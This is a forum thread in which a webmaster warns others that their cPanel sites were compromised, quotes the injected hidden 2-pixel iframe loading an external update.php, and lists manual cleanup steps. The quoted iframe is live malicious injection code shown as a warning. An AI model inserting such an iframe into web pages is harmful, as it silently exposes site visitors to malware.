Warning People for Cpanel Users MALWARE

katika

Junior Member
Joined
Feb 15, 2008
Messages
122
Reaction score
121
I am really pissed now, Google send me notice that my main site is flagged cause there is Malware.

I am in the middle of promotion, agghhhh.

So motherfuckers injected iframe in my head section, randomly, in plugins, theme...

Here is code:

Code:
<iframe src="http://www.phrae.tv/images/update.php" width="2" height="2" frameborder="0"></iframe>

Few weeks ago I received Email from one of the BH forum, do not remember which one, to buy some crazy tool for code injection, deal was about 100 USD

Now every fool and his brother can hack Cpanel for small price, without to know codes.

I have customer sites on that Cpanel. And every one is infected with this iframe.

And Cpanel does not have multiple find replace tool.

So i must download every backup and do cleaning and upload files. And to be on Big. G mercy to remove flag from search results....

Don't kno what to say. Any suggestions. Tips. Words to calm me down :(


katika
 

njohnson3163

Newbie
Joined
Jun 25, 2012
Messages
14
Reaction score
3
thanks for warning me about that! i'm actually going to look into how to secure myself from that now
 

katika

Junior Member
Joined
Feb 15, 2008
Messages
122
Reaction score
121
Here is update

Big G removed warning after 6-12 hours after I submitted review button in webmaster tool.

Once again: I got email from Big G. cause I had inactive Adwords ad. So if I did not had the site in Adw. this site and other on same cPanel still be infected with this 2px iframe.

0ther Cpanels from my WHM were not infected.

All my 12 domains on that Cpanel acc. were infected, php files (wordpress or other) which had something with head section of site, mostly header.php in theme folder, some plugins files... other main WP folder and some root files too, about 50-60 files per site.

I have lot of plugins and every site is 40-70 megs.

Here are the steps for cleaning malware...:

1. I compressed files in zip in Cpanel
2. Download them, one by one
3. Unpack them
4. Multiple find replace to remove iframe code.
5. Zip them and Upload to server.
6. Open every domain in browser to look if I did good job
7. Submitted form to Big G to ask for review


This step 5 was time consumer, infected files are in all folders, and I do not have unlimited upload speed, so I split files to get zip 5-20 mega per site.

Took me about 3 hours to do that.

Google removed Red Window Warning in 15 minutes.

I was tired (3dth hour after midnight), this saga was long about 6-7 hours: from email from Big G and my stress... browsing to find about problem, coffee breaks, tactic...

When I wake up Warning blue line in search engine result was gone :)

I hope this kind of problems you will never have, but here is my story and steps to solve problem.

The worse thing: my VPS support failed me, they never answer to my tickets.

Maybe they can speed up the task to do multiple find replace in server, but I do not know if Linux have this option as Win.

regards
katika
 
Last edited:

iulianh

Regular Member
Joined
Feb 3, 2008
Messages
349
Reaction score
510
I think unmanaged linux VPS without CPanel is safer now :) Thanks for the heads up
 

SmartMan

BANNED
Joined
Jul 25, 2012
Messages
673
Reaction score
1,253
Did you use any nulled themes/plugins on any of your sites? Also which hosting do you use?
 
Top